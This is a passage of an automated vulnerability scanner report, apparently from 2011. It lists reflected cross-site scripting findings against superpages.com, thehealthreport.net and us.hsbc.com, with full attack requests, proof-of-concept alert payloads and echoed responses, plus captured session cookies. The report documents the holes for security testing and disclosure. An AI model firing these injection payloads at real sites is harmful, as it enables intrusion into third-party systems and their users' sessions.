4.519. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [TR parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the TR request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 843a2"-alert(1)-"a8e7c8583e3 was submitted in the TR parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750623993-www.superpages.com-28426864-914831; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:23 GMT; Path=/
Set-Cookie: JSESSIONID=265FBF1301E359B78C423E3003AF80EE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:30:23 GMT
Connection: close
Content-Length: 23380


<!--
-->
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>
Superpages.com
...[SNIP]...
ype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.520. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [bidType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the bidType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5dd4"-alert(1)-"d9f9799ecf8 was submitted in the bidType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750603809-www.superpages.com-9081164-800011; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:03 GMT; Path=/
Set-Cookie: JSESSIONID=219F120FEB2F8290C38E110E827DE695; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:30:03 GMT
Content-Length: 66496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
archtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile';
//-->
...[SNIP]...

4.521. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [lbp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the lbp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f71cf"-alert(1)-"8b1ed61181f was submitted in the lbp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750510916-www.superpages.com-5233303-969715; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:28:30 GMT; Path=/
Set-Cookie: JSESSIONID=742BF78E1A6BFC3ABF53A5C98640882B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:28:30 GMT
Content-Length: 60956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank - Handlin
...[SNIP]...
= 'http://www.superpages.com';
var searchtype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile';
//-->
...[SNIP]...

4.522. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7992e"-alert(1)-"47024e3844d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750649070-www.superpages.com-20879668-932317; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:49 GMT; Path=/
Set-Cookie: JSESSIONID=3B2D663DFEFD640AA8C05C35E7490265; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:30:48 GMT
Content-Length: 23390


<!--
-->
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>
Superpages.com
...[SNIP]...
pe="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.523. http://www.superpages.com/bp/xmlproxy [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/xmlproxy

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f53dc"-alert(1)-"b9a871a93d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_cc=true; s_lastvisit=1296748870245; s_pv=Business%20Profile; s_dfa=superpagescom; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:03:55 GMT
Content-Length: 57628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
ellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.524. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /coupons

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3b22"-alert(1)-"6172bed7d5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coupons?f3b22"-alert(1)-"6172bed7d5b=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=14A03C36B158EBE2AE84FEB1EA46C2E7; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 74692
Date: Thu, 03 Feb 2011 17:09:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h
...[SNIP]...
//yellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/coupons?f3b22"-alert(1)-"6172bed7d5b=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.525. http://www.superpages.com/inc/social/sln.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/sln.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54e04"-alert(1)-"5dda26f052b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomlocal1a%26lbp%3D1%26PGID%3Ddalms102.8089.1296748577335.307646855%26bidType%3DCLIK%26TR%3D1&s=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 404 /inc/social/54e04&quot;-alert(1)-&quot;5dda26f052b
Server: Unspecified
Set-Cookie: JSESSIONID=E867CF351209BE67050698C0585FCB01; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:06:55 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
var hostServ = 'http://www.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://www.superpages.com/inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomloc
...[SNIP]...

4.526. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a was submitted in the REST URL parameter 2. This input was echoed as 4500c<img src=a onerror=alert(1)>46b2d68491a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:45 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:46GMT
Content-Length: 58480
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:46 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a in Y
...[SNIP]...
<h1>Select a State to view Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a Listings </h1>
...[SNIP]...

4.527. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 was submitted in the REST URL parameter 2. This input was echoed as 43ba5"><img src=a onerror=alert(1)>935e0c29137 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:36 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:36GMT
Content-Length: 59492
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:36 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks43ba5"><img Src=a Onerror=alert(1)>935e0c29137 in Yellow Pages by SuperPages">
...[SNIP]...

4.528. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41c54"><img src=a onerror=alert(1)>2bfa6c73542 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks?41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:55 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:06:56GMT
Content-Length: 60810
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:56 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks?41c54"><img Src=a Onerror=alert(1)>2bfa6c73542=1 in Yellow Pages by SuperPages">
...[SNIP]...

4.529. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf72b<img src=a onerror=alert(1)>ee7e8ccc6d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks?bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:06 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:06GMT
Content-Length: 59798
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:06 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 i
...[SNIP]...
<h1>Select a State to view Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 Listings </h1>
...[SNIP]...

4.530. http://www.thehealthreport.net/ac-usap.php [sub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thehealthreport.net
Path:   /ac-usap.php

Issue detail

The value of the sub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e765"><script>alert(1)</script>4ba170077e5 was submitted in the sub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ac-usap.php?sub=xyp7e765"><script>alert(1)</script>4ba170077e5 HTTP/1.1
Host: www.thehealthreport.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748883062&k=banks&l=Dallas%2c+TX
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:04:01 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Connection: keep-alive
Content-Length: 48515

...

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<!-- saved from url=(0034)http://www.channel5healthnews.net/ -->
<H
...[SNIP]...
<A href="http://ziggymedia.go2cloud.org/aff_c?offer_id=6&aff_id=1001&source=xyp7e765"><script>alert(1)</script>4ba170077e5-dp"
target=_blank>
...[SNIP]...

4.531. http://www.us.hsbc.com/1/2/3 [hp_pref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3

Issue detail

The value of the hp_pref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74bf5"%3balert(1)//00c0d1ff9 was submitted in the hp_pref parameter. This input was echoed as 74bf5";alert(1)//00c0d1ff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/2/3?command=makeThisMyHome&hp_pref=r74bf5"%3balert(1)//00c0d1ff9 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:06 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:10:07 GMT
Vary: User-Agent,Cookie
Content-Length: 5895
Set-Cookie: USIB2G=00005EK9jF4bpOMzFrUSkh3Dd5x:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
<script language="javascript">
       var date = new Date();
